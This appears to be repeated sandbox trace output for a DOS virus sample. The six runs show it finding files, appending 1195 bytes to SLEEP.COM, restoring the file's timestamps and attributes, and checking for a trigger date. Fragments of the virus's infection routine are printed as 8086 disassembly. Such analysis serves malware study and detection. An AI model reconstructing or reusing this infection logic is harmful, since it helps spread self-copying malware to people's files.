{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":3146,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:48:40.181368825Z 71 PC: 12b2d | Get current directory
2018-12-25T11:48:40.184783599Z 59 PC: 12b38 | Change current directory
2018-12-25T11:48:40.189128138Z 26 PC: 12beb | Set disk transfer address
2018-12-25T11:48:40.190011481Z 78 PC: 12bf9 | Find first file
2018-12-25T11:48:40.202438596Z 61 PC: 12c24 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:40.209713305Z 63 PC: 12c36 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T11:48:40.216515543Z 44 PC: 12c9e | Get time 0x12c9e: add dl, dh
0x12ca0: je 0x12c9a
0x12ca2: mov si, 0x115
0x12ca5: add si, word ptr [0x106]
0x12ca9: mov byte ptr [si], dl
0x12cab: mov ax, 0x4301
0x12cae: xor cx, cx
0x12cb0: mov dx, si
0x12cb2: add dx, 0xb4
0x12cb6: int 0x21
0x12cb8: mov ah, 0x3e
0x12cba: int 0x21
0x12cbc: mov ax, 0x3d02
0x12cbf: int 0x21
0x12cc1: jb 0x12c45
0x12cc3: mov di, dx
0x12cc5: add di, 0x5d
0x12cc8: stosw word ptr es:[di], ax
0x12cc9: xchg ax, bx
0x12cca: mov ah, 0x40
2018-12-25T11:48:40.218732833Z 67 PC: 12cb8 | Get or set file attributes
2018-12-25T11:48:40.59571518Z 62 PC: 12cbc | Close file
2018-12-25T11:48:40.598376317Z 61 PC: 12cc1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:40.606329067Z 64 PC: 12cd4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:48:40.610654135Z 64 PC: 12ce6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:48:40.614107265Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:48:40.617410837Z 66 PC: 12d04 | Move file pointer
2018-12-25T11:48:40.621418032Z 64 PC: 12a82 | Write file or device (Write 1195 bytes on handle 5)
2018-12-25T11:48:40.633052825Z 87 PC: 12d1d | Get or set file date and time
2018-12-25T11:48:40.635243794Z 62 PC: 12d21 | Close file
2018-12-25T11:48:40.645333609Z 67 PC: 12d32 | Get or set file attributes
2018-12-25T11:48:40.656349259Z 79 PC: 12c0c | Find next file
2018-12-25T11:48:40.659474973Z 61 PC: 12c24 | Open file (See above)
2018-12-25T11:48:40.66718906Z 63 PC: 12c36 | Read file or device (See above)
2018-12-25T11:48:40.689634093Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:40.693260524Z 67 PC: 12cb8 | Get or set file attributes (See above)
2018-12-25T11:48:40.704824674Z 62 PC: 12cbc | Close file (See above)
2018-12-25T11:48:40.707653128Z 61 PC: 12cc1 | Open file (See above)
2018-12-25T11:48:40.715087562Z 64 PC: 12cd4 | Write file or device (See above)
2018-12-25T11:48:40.718023412Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:48:40.721672722Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T11:48:40.724776476Z 66 PC: 12d04 | Move file pointer (See above)
2018-12-25T11:48:40.727207847Z 64 PC: 12a82 | Write file or device (See above)
2018-12-25T11:48:40.738430682Z 87 PC: 12d1d | Get or set file date and time (See above)
2018-12-25T11:48:40.740837441Z 62 PC: 12d21 | Close file (See above)
2018-12-25T11:48:40.7497229Z 67 PC: 12d32 | Get or set file attributes (See above)
2018-12-25T11:48:40.763618576Z 79 PC: 12c0c | Find next file (See above)
2018-12-25T11:48:40.766519711Z 61 PC: 12c24 | Open file (See above)
2018-12-25T11:48:40.777126548Z 63 PC: 12c36 | Read file or device (See above)
2018-12-25T11:48:40.785340496Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:40.788313415Z 67 PC: 12cb8 | Get or set file attributes (See above)
2018-12-25T11:48:40.803055964Z 62 PC: 12cbc | Close file (See above)
2018-12-25T11:48:40.808340344Z 61 PC: 12cc1 | Open file (See above)
2018-12-25T11:48:40.81610851Z 64 PC: 12cd4 | Write file or device (See above)
2018-12-25T11:48:40.820064882Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:48:40.823281411Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T11:48:40.827305132Z 66 PC: 12d04 | Move file pointer (See above)
2018-12-25T11:48:40.829487282Z 64 PC: 12a82 | Write file or device (See above)
2018-12-25T11:48:40.841669017Z 87 PC: 12d1d | Get or set file date and time (See above)
2018-12-25T11:48:40.844931958Z 62 PC: 12d21 | Close file (See above)
2018-12-25T11:48:40.853932295Z 67 PC: 12d32 | Get or set file attributes (See above)
2018-12-25T11:48:40.865209479Z 42 PC: 12b53 | Get date 0x12b53: cmp dx, 0x606
0x12b57: je 0x12b5c
0x12b59: jmp 0x12da2
0x12b5c: jmp 0x12d37
0x12b5f: and ah, bh
0x12b61: movsw word ptr es:[di], word ptr [si]
0x12b62: mov ax, 0x5c4c
0x12b65: add word ptr [di], ax
0x12b67: add byte ptr [di - 0x75], dl
0x12b6a: in al, dx
0x12b6b: sub sp, 0x2c
0x12b6e: push si
0x12b6f: jmp 0x12be0
0x12b71: mov ah, 0x1a
0x12b73: lea dx, word ptr [bp - 0x2c]
0x12b76: int 0x21
0x12b78: mov ah, 0x4e
0x12b7a: mov cx, 0x10
0x12b7d: mov dx, 0x1a2
0x12b80: add dx, word ptr [0x106]
2018-12-25T11:48:40.869275673Z 59 PC: 12dad | Change current directory
2018-12-25T11:48:40.874801122Z 59 PC: 12db4 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":3146,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:48:40.413051822Z 71 PC: 12b2d | Get current directory
2018-12-25T11:48:40.417332163Z 59 PC: 12b38 | Change current directory
2018-12-25T11:48:40.421738557Z 26 PC: 12beb | Set disk transfer address
2018-12-25T11:48:40.422649119Z 78 PC: 12bf9 | Find first file
2018-12-25T11:48:40.434269557Z 61 PC: 12c24 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:40.447004634Z 63 PC: 12c36 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T11:48:40.453030028Z 44 PC: 12c9e | Get time 0x12c9e: add dl, dh
0x12ca0: je 0x12c9a
0x12ca2: mov si, 0x115
0x12ca5: add si, word ptr [0x106]
0x12ca9: mov byte ptr [si], dl
0x12cab: mov ax, 0x4301
0x12cae: xor cx, cx
0x12cb0: mov dx, si
0x12cb2: add dx, 0xb4
0x12cb6: int 0x21
0x12cb8: mov ah, 0x3e
0x12cba: int 0x21
0x12cbc: mov ax, 0x3d02
0x12cbf: int 0x21
0x12cc1: jb 0x12c45
0x12cc3: mov di, dx
0x12cc5: add di, 0x5d
0x12cc8: stosw word ptr es:[di], ax
0x12cc9: xchg ax, bx
0x12cca: mov ah, 0x40
2018-12-25T11:48:40.455232432Z 67 PC: 12cb8 | Get or set file attributes
2018-12-25T11:48:40.596021611Z 62 PC: 12cbc | Close file
2018-12-25T11:48:40.598474924Z 61 PC: 12cc1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:40.60622717Z 64 PC: 12cd4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:48:40.610890381Z 64 PC: 12ce6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:48:40.613976866Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:48:40.616988458Z 66 PC: 12d04 | Move file pointer
2018-12-25T11:48:40.620782063Z 64 PC: 12a82 | Write file or device (Write 1195 bytes on handle 5)
2018-12-25T11:48:40.632217339Z 87 PC: 12d1d | Get or set file date and time
2018-12-25T11:48:40.635593475Z 62 PC: 12d21 | Close file
2018-12-25T11:48:40.647673453Z 67 PC: 12d32 | Get or set file attributes
2018-12-25T11:48:40.655420565Z 79 PC: 12c0c | Find next file
2018-12-25T11:48:40.657982964Z 61 PC: 12c24 | Open file (See above)
2018-12-25T11:48:40.663081095Z 63 PC: 12c36 | Read file or device (See above)
2018-12-25T11:48:40.668433688Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:40.66999809Z 67 PC: 12cb8 | Get or set file attributes (See above)
2018-12-25T11:48:40.678443426Z 62 PC: 12cbc | Close file (See above)
2018-12-25T11:48:40.68751846Z 61 PC: 12cc1 | Open file (See above)
2018-12-25T11:48:40.695181033Z 64 PC: 12cd4 | Write file or device (See above)
2018-12-25T11:48:40.699548305Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:48:40.704355268Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T11:48:40.708908053Z 66 PC: 12d04 | Move file pointer (See above)
2018-12-25T11:48:40.71153309Z 64 PC: 12a82 | Write file or device (See above)
2018-12-25T11:48:40.733868062Z 87 PC: 12d1d | Get or set file date and time (See above)
2018-12-25T11:48:40.735871663Z 62 PC: 12d21 | Close file (See above)
2018-12-25T11:48:40.744782398Z 67 PC: 12d32 | Get or set file attributes (See above)
2018-12-25T11:48:40.760852993Z 79 PC: 12c0c | Find next file (See above)
2018-12-25T11:48:40.764788891Z 61 PC: 12c24 | Open file (See above)
2018-12-25T11:48:40.773357206Z 63 PC: 12c36 | Read file or device (See above)
2018-12-25T11:48:40.781573424Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:40.783978953Z 67 PC: 12cb8 | Get or set file attributes (See above)
2018-12-25T11:48:40.795367097Z 62 PC: 12cbc | Close file (See above)
2018-12-25T11:48:40.798031371Z 61 PC: 12cc1 | Open file (See above)
2018-12-25T11:48:40.802741255Z 64 PC: 12cd4 | Write file or device (See above)
2018-12-25T11:48:40.805014586Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:48:40.807310957Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T11:48:40.809612269Z 66 PC: 12d04 | Move file pointer (See above)
2018-12-25T11:48:40.811033684Z 64 PC: 12a82 | Write file or device (See above)
2018-12-25T11:48:40.817970417Z 87 PC: 12d1d | Get or set file date and time (See above)
2018-12-25T11:48:40.820709703Z 62 PC: 12d21 | Close file (See above)
2018-12-25T11:48:40.826260782Z 67 PC: 12d32 | Get or set file attributes (See above)
2018-12-25T11:48:40.833665629Z 42 PC: 12b53 | Get date 0x12b53: cmp dx, 0x606
0x12b57: je 0x12b5c
0x12b59: jmp 0x12da2
0x12b5c: jmp 0x12d37
0x12b5f: and ah, bh
0x12b61: movsw word ptr es:[di], word ptr [si]
0x12b62: mov ax, 0x5c4c
0x12b65: add word ptr [di], ax
0x12b67: add byte ptr [di - 0x75], dl
0x12b6a: in al, dx
0x12b6b: sub sp, 0x2c
0x12b6e: push si
0x12b6f: jmp 0x12be0
0x12b71: mov ah, 0x1a
0x12b73: lea dx, word ptr [bp - 0x2c]
0x12b76: int 0x21
0x12b78: mov ah, 0x4e
0x12b7a: mov cx, 0x10
0x12b7d: mov dx, 0x1a2
0x12b80: add dx, word ptr [0x106]
2018-12-25T11:48:40.836215468Z 59 PC: 12dad | Change current directory
2018-12-25T11:48:40.839852527Z 59 PC: 12db4 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":3146,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:48:40.435021578Z 71 PC: 12b2d | Get current directory
2018-12-25T11:48:40.442753053Z 59 PC: 12b38 | Change current directory
2018-12-25T11:48:40.44665668Z 26 PC: 12beb | Set disk transfer address
2018-12-25T11:48:40.447734598Z 78 PC: 12bf9 | Find first file
2018-12-25T11:48:40.453736743Z 61 PC: 12c24 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:40.457881664Z 63 PC: 12c36 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T11:48:40.462547662Z 44 PC: 12c9e | Get time 0x12c9e: add dl, dh
0x12ca0: je 0x12c9a
0x12ca2: mov si, 0x115
0x12ca5: add si, word ptr [0x106]
0x12ca9: mov byte ptr [si], dl
0x12cab: mov ax, 0x4301
0x12cae: xor cx, cx
0x12cb0: mov dx, si
0x12cb2: add dx, 0xb4
0x12cb6: int 0x21
0x12cb8: mov ah, 0x3e
0x12cba: int 0x21
0x12cbc: mov ax, 0x3d02
0x12cbf: int 0x21
0x12cc1: jb 0x12c45
0x12cc3: mov di, dx
0x12cc5: add di, 0x5d
0x12cc8: stosw word ptr es:[di], ax
0x12cc9: xchg ax, bx
0x12cca: mov ah, 0x40
2018-12-25T11:48:40.465110057Z 67 PC: 12cb8 | Get or set file attributes
2018-12-25T11:48:40.482908956Z 62 PC: 12cbc | Close file
2018-12-25T11:48:40.489350321Z 61 PC: 12cc1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:40.497272851Z 64 PC: 12cd4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:48:40.504471995Z 64 PC: 12ce6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:48:40.507315094Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:48:40.510171772Z 66 PC: 12d04 | Move file pointer
2018-12-25T11:48:40.512740769Z 64 PC: 12a82 | Write file or device (Write 1195 bytes on handle 5)
2018-12-25T11:48:40.522220294Z 87 PC: 12d1d | Get or set file date and time
2018-12-25T11:48:40.524026833Z 62 PC: 12d21 | Close file
2018-12-25T11:48:40.534331848Z 67 PC: 12d32 | Get or set file attributes
2018-12-25T11:48:40.544355005Z 79 PC: 12c0c | Find next file
2018-12-25T11:48:40.547375247Z 61 PC: 12c24 | Open file (See above)
2018-12-25T11:48:40.555113879Z 63 PC: 12c36 | Read file or device (See above)
2018-12-25T11:48:40.559568111Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:40.561183216Z 67 PC: 12cb8 | Get or set file attributes (See above)
2018-12-25T11:48:40.569125401Z 62 PC: 12cbc | Close file (See above)
2018-12-25T11:48:40.570609219Z 61 PC: 12cc1 | Open file (See above)
2018-12-25T11:48:40.57557275Z 64 PC: 12cd4 | Write file or device (See above)
2018-12-25T11:48:40.57836228Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:48:40.580185821Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T11:48:40.5819838Z 66 PC: 12d04 | Move file pointer (See above)
2018-12-25T11:48:40.586291142Z 64 PC: 12a82 | Write file or device (See above)
2018-12-25T11:48:40.592070664Z 87 PC: 12d1d | Get or set file date and time (See above)
2018-12-25T11:48:40.59322363Z 62 PC: 12d21 | Close file (See above)
2018-12-25T11:48:40.599733098Z 67 PC: 12d32 | Get or set file attributes (See above)
2018-12-25T11:48:40.608445649Z 79 PC: 12c0c | Find next file (See above)
2018-12-25T11:48:40.610726379Z 61 PC: 12c24 | Open file (See above)
2018-12-25T11:48:40.624232785Z 63 PC: 12c36 | Read file or device (See above)
2018-12-25T11:48:40.631037215Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:40.633472906Z 67 PC: 12cb8 | Get or set file attributes (See above)
2018-12-25T11:48:40.64966897Z 62 PC: 12cbc | Close file (See above)
2018-12-25T11:48:40.652221763Z 61 PC: 12cc1 | Open file (See above)
2018-12-25T11:48:40.65904066Z 64 PC: 12cd4 | Write file or device (See above)
2018-12-25T11:48:40.66279696Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:48:40.665976841Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T11:48:40.66879838Z 66 PC: 12d04 | Move file pointer (See above)
2018-12-25T11:48:40.6707408Z 64 PC: 12a82 | Write file or device (See above)
2018-12-25T11:48:40.680510794Z 87 PC: 12d1d | Get or set file date and time (See above)
2018-12-25T11:48:40.682250284Z 62 PC: 12d21 | Close file (See above)
2018-12-25T11:48:40.690419046Z 67 PC: 12d32 | Get or set file attributes (See above)
2018-12-25T11:48:40.700896554Z 42 PC: 12b53 | Get date 0x12b53: cmp dx, 0x606
0x12b57: je 0x12b5c
0x12b59: jmp 0x12da2
0x12b5c: jmp 0x12d37
0x12b5f: and ah, bh
0x12b61: movsw word ptr es:[di], word ptr [si]
0x12b62: mov ax, 0x5c4c
0x12b65: add word ptr [di], ax
0x12b67: add byte ptr [di - 0x75], dl
0x12b6a: in al, dx
0x12b6b: sub sp, 0x2c
0x12b6e: push si
0x12b6f: jmp 0x12be0
0x12b71: mov ah, 0x1a
0x12b73: lea dx, word ptr [bp - 0x2c]
0x12b76: int 0x21
0x12b78: mov ah, 0x4e
0x12b7a: mov cx, 0x10
0x12b7d: mov dx, 0x1a2
0x12b80: add dx, word ptr [0x106]
2018-12-25T11:48:40.703288188Z 59 PC: 12dad | Change current directory
2018-12-25T11:48:40.707470398Z 59 PC: 12db4 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":3146,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:48:40.672697568Z 71 PC: 12b2d | Get current directory
2018-12-25T11:48:40.676370524Z 59 PC: 12b38 | Change current directory
2018-12-25T11:48:40.68128717Z 26 PC: 12beb | Set disk transfer address
2018-12-25T11:48:40.682879917Z 78 PC: 12bf9 | Find first file
2018-12-25T11:48:40.69610299Z 61 PC: 12c24 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:40.703571976Z 63 PC: 12c36 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T11:48:40.710715107Z 44 PC: 12c9e | Get time 0x12c9e: add dl, dh
0x12ca0: je 0x12c9a
0x12ca2: mov si, 0x115
0x12ca5: add si, word ptr [0x106]
0x12ca9: mov byte ptr [si], dl
0x12cab: mov ax, 0x4301
0x12cae: xor cx, cx
0x12cb0: mov dx, si
0x12cb2: add dx, 0xb4
0x12cb6: int 0x21
0x12cb8: mov ah, 0x3e
0x12cba: int 0x21
0x12cbc: mov ax, 0x3d02
0x12cbf: int 0x21
0x12cc1: jb 0x12c45
0x12cc3: mov di, dx
0x12cc5: add di, 0x5d
0x12cc8: stosw word ptr es:[di], ax
0x12cc9: xchg ax, bx
0x12cca: mov ah, 0x40
2018-12-25T11:48:40.713096144Z 67 PC: 12cb8 | Get or set file attributes
2018-12-25T11:48:40.735510955Z 62 PC: 12cbc | Close file
2018-12-25T11:48:40.737998837Z 61 PC: 12cc1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:40.745694092Z 64 PC: 12cd4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:48:40.749815265Z 64 PC: 12ce6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:48:40.752705937Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:48:40.755447956Z 66 PC: 12d04 | Move file pointer
2018-12-25T11:48:40.758630481Z 64 PC: 12a82 | Write file or device (Write 1195 bytes on handle 5)
2018-12-25T11:48:40.770159261Z 87 PC: 12d1d | Get or set file date and time
2018-12-25T11:48:40.772337875Z 62 PC: 12d21 | Close file
2018-12-25T11:48:40.781042342Z 67 PC: 12d32 | Get or set file attributes
2018-12-25T11:48:40.793048604Z 79 PC: 12c0c | Find next file
2018-12-25T11:48:40.796424193Z 61 PC: 12c24 | Open file (See above)
2018-12-25T11:48:40.804314206Z 63 PC: 12c36 | Read file or device (See above)
2018-12-25T11:48:40.813091008Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:40.815633864Z 67 PC: 12cb8 | Get or set file attributes (See above)
2018-12-25T11:48:40.827630461Z 62 PC: 12cbc | Close file (See above)
2018-12-25T11:48:40.833810695Z 61 PC: 12cc1 | Open file (See above)
2018-12-25T11:48:40.841482676Z 64 PC: 12cd4 | Write file or device (See above)
2018-12-25T11:48:40.848538477Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:48:40.852042539Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T11:48:40.861576202Z 66 PC: 12d04 | Move file pointer (See above)
2018-12-25T11:48:40.863138318Z 64 PC: 12a82 | Write file or device (See above)
2018-12-25T11:48:40.87350198Z 87 PC: 12d1d | Get or set file date and time (See above)
2018-12-25T11:48:40.875615718Z 62 PC: 12d21 | Close file (See above)
2018-12-25T11:48:40.884238718Z 67 PC: 12d32 | Get or set file attributes (See above)
2018-12-25T11:48:40.896141441Z 79 PC: 12c0c | Find next file (See above)
2018-12-25T11:48:40.899205973Z 61 PC: 12c24 | Open file (See above)
2018-12-25T11:48:40.906393358Z 63 PC: 12c36 | Read file or device (See above)
2018-12-25T11:48:40.913638622Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:40.916221732Z 67 PC: 12cb8 | Get or set file attributes (See above)
2018-12-25T11:48:40.927405321Z 62 PC: 12cbc | Close file (See above)
2018-12-25T11:48:40.929430387Z 61 PC: 12cc1 | Open file (See above)
2018-12-25T11:48:40.938068537Z 64 PC: 12cd4 | Write file or device (See above)
2018-12-25T11:48:40.941494162Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:48:40.946498967Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T11:48:40.950318249Z 66 PC: 12d04 | Move file pointer (See above)
2018-12-25T11:48:40.953441265Z 64 PC: 12a82 | Write file or device (See above)
2018-12-25T11:48:40.963974005Z 87 PC: 12d1d | Get or set file date and time (See above)
2018-12-25T11:48:40.966310084Z 62 PC: 12d21 | Close file (See above)
2018-12-25T11:48:40.97568912Z 67 PC: 12d32 | Get or set file attributes (See above)
2018-12-25T11:48:40.986558365Z 42 PC: 12b53 | Get date 0x12b53: cmp dx, 0x606
0x12b57: je 0x12b5c
0x12b59: jmp 0x12da2
0x12b5c: jmp 0x12d37
0x12b5f: and ah, bh
0x12b61: movsw word ptr es:[di], word ptr [si]
0x12b62: mov ax, 0x5c4c
0x12b65: add word ptr [di], ax
0x12b67: add byte ptr [di - 0x75], dl
0x12b6a: in al, dx
0x12b6b: sub sp, 0x2c
0x12b6e: push si
0x12b6f: jmp 0x12be0
0x12b71: mov ah, 0x1a
0x12b73: lea dx, word ptr [bp - 0x2c]
0x12b76: int 0x21
0x12b78: mov ah, 0x4e
0x12b7a: mov cx, 0x10
0x12b7d: mov dx, 0x1a2
0x12b80: add dx, word ptr [0x106]
2018-12-25T11:48:40.989797463Z 59 PC: 12dad | Change current directory
2018-12-25T11:48:40.994150362Z 59 PC: 12db4 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":3146,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:48:40.684290618Z 71 PC: 12b2d | Get current directory
2018-12-25T11:48:40.687607957Z 59 PC: 12b38 | Change current directory
2018-12-25T11:48:40.691471002Z 26 PC: 12beb | Set disk transfer address
2018-12-25T11:48:40.69280335Z 78 PC: 12bf9 | Find first file
2018-12-25T11:48:40.704403419Z 61 PC: 12c24 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:40.71097979Z 63 PC: 12c36 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T11:48:40.717270854Z 44 PC: 12c9e | Get time 0x12c9e: add dl, dh
0x12ca0: je 0x12c9a
0x12ca2: mov si, 0x115
0x12ca5: add si, word ptr [0x106]
0x12ca9: mov byte ptr [si], dl
0x12cab: mov ax, 0x4301
0x12cae: xor cx, cx
0x12cb0: mov dx, si
0x12cb2: add dx, 0xb4
0x12cb6: int 0x21
0x12cb8: mov ah, 0x3e
0x12cba: int 0x21
0x12cbc: mov ax, 0x3d02
0x12cbf: int 0x21
0x12cc1: jb 0x12c45
0x12cc3: mov di, dx
0x12cc5: add di, 0x5d
0x12cc8: stosw word ptr es:[di], ax
0x12cc9: xchg ax, bx
0x12cca: mov ah, 0x40
2018-12-25T11:48:40.720752621Z 67 PC: 12cb8 | Get or set file attributes
2018-12-25T11:48:40.735769928Z 62 PC: 12cbc | Close file
2018-12-25T11:48:40.737537761Z 61 PC: 12cc1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:40.745399013Z 64 PC: 12cd4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:48:40.748229658Z 64 PC: 12ce6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:48:40.750657715Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:48:40.753627165Z 66 PC: 12d04 | Move file pointer
2018-12-25T11:48:40.755651856Z 64 PC: 12a82 | Write file or device (Write 1195 bytes on handle 5)
2018-12-25T11:48:40.764623235Z 87 PC: 12d1d | Get or set file date and time
2018-12-25T11:48:40.766484746Z 62 PC: 12d21 | Close file
2018-12-25T11:48:40.774753646Z 67 PC: 12d32 | Get or set file attributes
2018-12-25T11:48:40.784211359Z 79 PC: 12c0c | Find next file
2018-12-25T11:48:40.786984129Z 61 PC: 12c24 | Open file (See above)
2018-12-25T11:48:40.793586455Z 63 PC: 12c36 | Read file or device (See above)
2018-12-25T11:48:40.799719974Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:40.801676148Z 67 PC: 12cb8 | Get or set file attributes (See above)
2018-12-25T11:48:40.820640069Z 62 PC: 12cbc | Close file (See above)
2018-12-25T11:48:40.822631202Z 61 PC: 12cc1 | Open file (See above)
2018-12-25T11:48:40.828976705Z 64 PC: 12cd4 | Write file or device (See above)
2018-12-25T11:48:40.832158159Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:48:40.834706592Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T11:48:40.837105291Z 66 PC: 12d04 | Move file pointer (See above)
2018-12-25T11:48:40.839362612Z 64 PC: 12a82 | Write file or device (See above)
2018-12-25T11:48:40.848470908Z 87 PC: 12d1d | Get or set file date and time (See above)
2018-12-25T11:48:40.849874379Z 62 PC: 12d21 | Close file (See above)
2018-12-25T11:48:40.857862536Z 67 PC: 12d32 | Get or set file attributes (See above)
2018-12-25T11:48:40.867478528Z 79 PC: 12c0c | Find next file (See above)
2018-12-25T11:48:40.870277094Z 61 PC: 12c24 | Open file (See above)
2018-12-25T11:48:40.877418021Z 63 PC: 12c36 | Read file or device (See above)
2018-12-25T11:48:40.883710512Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:40.885785094Z 67 PC: 12cb8 | Get or set file attributes (See above)
2018-12-25T11:48:40.896328195Z 62 PC: 12cbc | Close file (See above)
2018-12-25T11:48:40.900968341Z 61 PC: 12cc1 | Open file (See above)
2018-12-25T11:48:40.912956621Z 64 PC: 12cd4 | Write file or device (See above)
2018-12-25T11:48:40.921536022Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:48:40.924097222Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T11:48:40.926570324Z 66 PC: 12d04 | Move file pointer (See above)
2018-12-25T11:48:40.928494741Z 64 PC: 12a82 | Write file or device (See above)
2018-12-25T11:48:40.937747985Z 87 PC: 12d1d | Get or set file date and time (See above)
2018-12-25T11:48:40.939960473Z 62 PC: 12d21 | Close file (See above)
2018-12-25T11:48:40.948232898Z 67 PC: 12d32 | Get or set file attributes (See above)
2018-12-25T11:48:40.960030763Z 42 PC: 12b53 | Get date 0x12b53: cmp dx, 0x606
0x12b57: je 0x12b5c
0x12b59: jmp 0x12da2
0x12b5c: jmp 0x12d37
0x12b5f: and ah, bh
0x12b61: movsw word ptr es:[di], word ptr [si]
0x12b62: mov ax, 0x5c4c
0x12b65: add word ptr [di], ax
0x12b67: add byte ptr [di - 0x75], dl
0x12b6a: in al, dx
0x12b6b: sub sp, 0x2c
0x12b6e: push si
0x12b6f: jmp 0x12be0
0x12b71: mov ah, 0x1a
0x12b73: lea dx, word ptr [bp - 0x2c]
0x12b76: int 0x21
0x12b78: mov ah, 0x4e
0x12b7a: mov cx, 0x10
0x12b7d: mov dx, 0x1a2
0x12b80: add dx, word ptr [0x106]
2018-12-25T11:48:40.962039971Z 59 PC: 12dad | Change current directory
2018-12-25T11:48:40.966273778Z 59 PC: 12db4 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":3146,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:48:40.865044522Z 71 PC: 12b2d | Get current directory
2018-12-25T11:48:40.869679659Z 59 PC: 12b38 | Change current directory
2018-12-25T11:48:40.872893922Z 26 PC: 12beb | Set disk transfer address
2018-12-25T11:48:40.873991276Z 78 PC: 12bf9 | Find first file
2018-12-25T11:48:40.883143006Z 61 PC: 12c24 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:40.896125796Z 63 PC: 12c36 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T11:48:40.904016737Z 44 PC: 12c9e | Get time 0x12c9e: add dl, dh
0x12ca0: je 0x12c9a
0x12ca2: mov si, 0x115
0x12ca5: add si, word ptr [0x106]
0x12ca9: mov byte ptr [si], dl
0x12cab: mov ax, 0x4301
0x12cae: xor cx, cx
0x12cb0: mov dx, si
0x12cb2: add dx, 0xb4
0x12cb6: int 0x21
0x12cb8: mov ah, 0x3e
0x12cba: int 0x21
0x12cbc: mov ax, 0x3d02
0x12cbf: int 0x21
0x12cc1: jb 0x12c45
0x12cc3: mov di, dx
0x12cc5: add di, 0x5d
0x12cc8: stosw word ptr es:[di], ax
0x12cc9: xchg ax, bx
0x12cca: mov ah, 0x40
2018-12-25T11:48:40.90693429Z 67 PC: 12cb8 | Get or set file attributes
